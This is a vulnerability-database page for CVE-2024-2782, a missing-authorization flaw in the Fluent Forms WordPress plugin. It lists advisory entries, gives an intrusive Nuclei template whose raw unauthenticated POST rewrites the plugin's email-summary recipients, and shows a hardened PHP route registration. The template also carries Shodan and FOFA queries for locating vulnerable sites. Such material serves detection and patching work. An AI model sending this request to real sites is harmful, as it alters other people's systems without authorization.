| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-2782 | 3 Aug 2025 09:00 | – | circl |
| WordPress plugin Fluent Forms security vulnerability | 18 May 2024 00:00 | – | cnnvd |
| CVE-2024-2782 | 18 May 2024 07:38 | – | cve |
| CVE-2024-2782 Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.16 - Missing Authorization to Setting Manipulation | 18 May 2024 07:38 | – | cvelist |
| EUVD-2024-27726 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-2782 | 18 May 2024 08:15 | – | nvd |
| CVE-2024-2782 | 18 May 2024 08:15 | – | osv |
| WordPress FluentForm plugin <= 5.1.16 - Missing Authorization to Setting Manipulation vulnerability | 20 May 2024 01:11 | – | patchstack |
| WordPress FluentForm Plugin <= 5.1.16 is vulnerable to Broken Access Control | 20 May 2024 00:00 | – | patchstack |
| PT-2024-22058 | 18 May 2024 00:00 | – | ptsecurity |
```yaml
id: CVE-2024-2782

info:
  name: WordPress FluentForms <= 5.1.16 - Broken Access Control
  author: riteshs4hu
  severity: high
  description: |
    The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp-json/fluentform/v1/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin's settings.
  impact: |
    Unauthenticated attackers can modify all Fluent Forms plugin settings including email configurations and other sensitive parameters.
  remediation: |
    Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
  reference:
    - https://github.com/whale93/CVE-2024-2782-PoC
    - https://wpscan.com/vulnerability/075faf77-2787-4da7-bbfd-ea3c14993cc6/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2782
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0814e7b3-404a-4db5-b564-46c9086ec048?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-2782
    cwe-id: CWE-862
    epss-score: 0.0123
    epss-percentile: 0.65269
    cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fluentforms
    product: contact_form
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/fluentform/"
    fofa-query: body="/wp-content/plugins/fluentform/"
    publicwww-query: "/wp-content/plugins/fluentform/"
  tags: cve,cve2024,wordpress,wp-plugin,wp,fluentform,wpscan,intrusive,vkev,vuln

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /wp-json/fluentform/v1/global-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "key": "emailSummarySettings",
          "email_report": {
            "status": "yes",
            "send_to_type": "custom",
            "custom_recipients": "{{email}}",
            "sending_day": "Mon"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "true")'
          - 'len(body)==4'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502210080c2ca0093fad0f163dcb430158e7060bc473332f824d2225049865a352c5920022049b533a85f80fd1ecd29ea0cfd65d02109ec344b2eac6b6e74d8e809e0e75df8:922c64590222798bb761d5b6d8e72950
```
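The defect class behind CWE-862 here is a WordPress REST route whose settings handler runs without a capability check. The following is an added illustration of the hardened registration pattern, not Fluent Forms' own code: the route path mirrors the affected endpoint from the template above, while the handler and option names (`example_plugin_*`) are hypothetical.

```php
<?php
// Added example (not the plugin's code): a settings endpoint registered with an
// explicit capability check in permission_callback, the control whose absence
// lets unauthenticated callers change settings (CWE-862).

add_action('rest_api_init', function () {
    // Weak pattern to look for in review: a permission_callback that always allows,
    // e.g. 'permission_callback' => '__return_true', so the callback runs for
    // logged-out callers. The hardened form below gates on a capability instead.
    register_rest_route('fluentform/v1', '/global-settings', [
        'methods'             => WP_REST_Server::EDITABLE, // POST/PUT/PATCH
        'callback'            => 'example_plugin_update_global_settings',
        'permission_callback' => function (WP_REST_Request $request) {
            // Cookie-authenticated callers are only recognised by WP core when a
            // valid X-WP-Nonce accompanies the request; otherwise they are treated
            // as logged out and this check fails, which also blocks CSRF.
            if (!current_user_can('manage_options')) {
                return new WP_Error(
                    'rest_forbidden',
                    __('Insufficient privileges to modify settings.'),
                    ['status' => rest_authorization_required_code()] // 401 or 403
                );
            }
            return true;
        },
        'args' => [
            'key' => [
                'required'          => true,
                'type'              => 'string',
                // Only accept known setting groups; the template above uses this one.
                'enum'              => ['emailSummarySettings'],
                'sanitize_callback' => 'sanitize_key',
            ],
        ],
    ]);
});

// Hypothetical handler: persists the validated payload under a namespaced option.
function example_plugin_update_global_settings(WP_REST_Request $request) {
    $key     = $request->get_param('key');
    $payload = $request->get_json_params();
    update_option('example_plugin_' . $key, $payload);
    // Responds with JSON `true`, the body the template's matcher checks for
    // (contains "true", length 4); on a patched site it is only reachable
    // after the capability check succeeds.
    return rest_ensure_response(true);
}
```

With this in place, an unauthenticated request to the endpoint receives a 401 `rest_forbidden` error instead of the `true` body, so the template above no longer matches.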